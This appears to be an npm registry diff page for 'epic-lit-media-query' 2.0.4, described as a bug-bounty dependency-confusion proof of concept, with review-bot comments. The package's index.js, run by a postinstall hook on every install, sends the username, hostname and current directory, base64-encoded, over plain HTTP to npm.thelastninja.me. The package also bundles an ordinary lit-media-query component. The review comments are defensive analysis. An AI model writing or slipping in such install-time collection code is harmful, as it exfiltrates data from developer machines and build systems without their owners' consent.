epic-lit-media-query 2.0.4


Potentially problematic release.


This version of epic-lit-media-query might be problematic. Click here for more details.

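--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,5 @@
+ ### epic-lit-media-query
+
+ This is a proof of concept package to demonstrate dependency confusion in a particular program.
+
+ It collects basic information to demonstrate impact to the triage team, for inquiries please reach out to: thelastninja@wearehackerone.com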
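--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,33 @@
+ const os = require('os');
+ const http = require('http');
+
+ // This is a proof-of-concept package that is part of a Bug Bounty compaign
+ // Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
+ // It collects username, hostname and current path and submits them to a remote server to demonstrate impact
+ // For any inquiries please reach out to: thelastninja@wearehackerone.com
+
+ async function sendUserInfoToLogging() {
+ try {
+ const userInfo = os.userInfo();
+ const hostname = os.hostname();
+ const currentPath = process.cwd();
+
+ // Combine user and host information
+ const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
+
+ // Base64 encode the combined string
+ const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
+
+ // Construct the URL with encoded user information
+ const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
+
+ // Send a GET request to the logging endpoint
+ const response = await http.get(url);
+
+ } catch (error) {
+ console.error('Error sending user info to logging:', error.message);
+ }
+ }
+
+ // Call the function to send user info to logging
+ sendUserInfoToLogging();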
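Review bot: The header comment (new lines 4–7) calls the package non-malicious but does not say when the collection runs or how the data is protected, and the code has no consent or scope check: `sendUserInfoToLogging()` is called unconditionally at module load, which the package's `postinstall` script turns into every install. The `username@hostname:cwd` string is only base64-encoded, which is reversible, and it travels in the query string of a plain `http://` request, so it is readable on the network path and likely to be retained in server and proxy logs. I would have the comment state this directly, e.g. `// Runs on load and on install; sends username@hostname:cwd, base64-encoded (not encrypted), over plain HTTP`. For anyone triaging an affected host: `http.get` returns a request object rather than a promise, so the `await` does not wait and the `catch` does not see connection errors; with egress blocked this may show up as a failed install step rather than the logged message.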
@@ -0,0 +1,139 @@
1
+ import {
2
+ LitElement,
3
+ html
4
+ } from 'lit-element';
5
+
6
+ /**
7
+ * The `lit-media-query` component detects when a media query
8
+ * is `true` or `false`.
9
+ */
10
+ class LitMediaQuery extends LitElement {
11
+ /**
12
+ * Fired when `lit-media-query` changes detects a change
13
+ * in the media query (from `true` to `false` and vice versa).
14
+ *
15
+ * @event changed
16
+ * @param {boolean} value If media query is being fulfilled or not.
17
+ */
18
+
19
+ static get properties() {
20
+ return {
21
+ /**
22
+ * Media query to be watched by the element.
23
+ *
24
+ * Can be modified at run time by setting a new value.
25
+ */
26
+ query: {
27
+ type: String
28
+ },
29
+ _match: {
30
+ type: Boolean
31
+ }
32
+ };
33
+ }
34
+
35
+ constructor() {
36
+ super();
37
+ this.query = '(max-width:460px)';
38
+ this._match = false;
39
+ this.boundResizeHandler = this._handleRisize.bind(this);
40
+ }
41
+
42
+ render() {
43
+ return html `
44
+ <style>
45
+ :host {
46
+ display: none;
47
+ }
48
+ </style>
49
+ `;
50
+ }
51
+
52
+ firstUpdated() {
53
+ // Check media query once before 'resize' event
54
+ this._initialMediaQueryCheck();
55
+ }
56
+
57
+ connectedCallback() {
58
+ super.connectedCallback();
59
+ // Check if Visual Viewport API is supported
60
+ if (typeof window.visualViewport !== 'undefined') {
61
+ window.visualViewport.addEventListener('resize', this.boundResizeHandler);
62
+ } else {
63
+ window.addEventListener('resize', this.boundResizeHandler);
64
+ }
65
+ }
66
+
67
+ disconnectedCallback() {
68
+ // Remove event listeners
69
+ if (typeof window.visualViewport !== 'undefined') {
70
+ window.visualViewport.removeEventListener(
71
+ 'resize',
72
+ this.boundResizeHandler
73
+ );
74
+ } else {
75
+ window.removeEventListener('resize', this.boundResizeHandler);
76
+ }
77
+ super.disconnectedCallback();
78
+ }
79
+
80
+ _initialMediaQueryCheck() {
81
+ if (window.matchMedia(this.query).matches) {
82
+ this.dispatchEvent(
83
+ new CustomEvent('changed', {
84
+ detail: {
85
+ value: true
86
+ },
87
+ composed: true,
88
+ bubbles: true
89
+ })
90
+ );
91
+ } else {
92
+ this.dispatchEvent(
93
+ new CustomEvent('changed', {
94
+ detail: {
95
+ value: false
96
+ },
97
+ composed: true,
98
+ bubbles: true
99
+ })
100
+ );
101
+ }
102
+ }
103
+
104
+ _handleRisize() {
105
+ if (window.matchMedia(this.query).matches) {
106
+ // From no match to match
107
+ if (this._match === false) {
108
+ this.dispatchEvent(
109
+ new CustomEvent('changed', {
110
+ detail: {
111
+ value: true
112
+ },
113
+ composed: true,
114
+ bubbles: true
115
+ })
116
+ );
117
+ this._match = true;
118
+ }
119
+ } else {
120
+ // From match to no match
121
+ if (this._match === true) {
122
+ this.dispatchEvent(
123
+ new CustomEvent('changed', {
124
+ detail: {
125
+ value: false
126
+ },
127
+ composed: true,
128
+ bubbles: true
129
+ })
130
+ );
131
+ this._match = false;
132
+ }
133
+ }
134
+ }
135
+ }
136
+
137
+ if (!window.customElements.get('lit-media-query')) {
138
+ customElements.define('lit-media-query', LitMediaQuery);
139
+ }
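Review bot: `_initialMediaQueryCheck()` dispatches `changed` but never writes `this._match`, so when the query already matches at first render `_match` stays `false` and the first resize fires a second `changed` with `value: true`. Setting `this._match = window.matchMedia(this.query).matches;` at the top of `_initialMediaQueryCheck()` and dispatching that value would keep it consistent with `_handleRisize()`. The page shows no file header for this hunk, and neither the visible index.js nor package.json references it, so it appears not to be loaded by the package's declared entry point.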
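--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,21 @@
+ {
+ "name": "epic-lit-media-query",
+ "version": "2.0.4",
+ "description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1",
+ "postinstall": "node index.js"
+ },
+ "repository": {},
+ "keywords": [
+ "poc"
+ ],
+ "author": "thelastninja@wearehackerone.com",
+ "license": "MIT",
+ "bugs": {
+ "url": "https://hackerone.com/thelastninja"
+ },
+ "homepage": "https://hackerone.com/thelastninja",
+ "dependencies": {}
+ }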
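Review bot: The `postinstall` entry runs `node index.js` during installation, so the collection in index.js executes on any workstation or CI runner that resolves this package name, before any application code imports it; with `"main": "index.js"` a later `require` triggers it again. `repository` is an empty object and the only contact is an e-mail address, so a consumer cannot tie this 2.0.4 release to a source tree. I would drop the `"postinstall": "node index.js"` line so that nothing executes at install time. On the consuming side, installing with `--ignore-scripts` and binding internal package names to a private registry scope are the controls that limit exposure to a package like this.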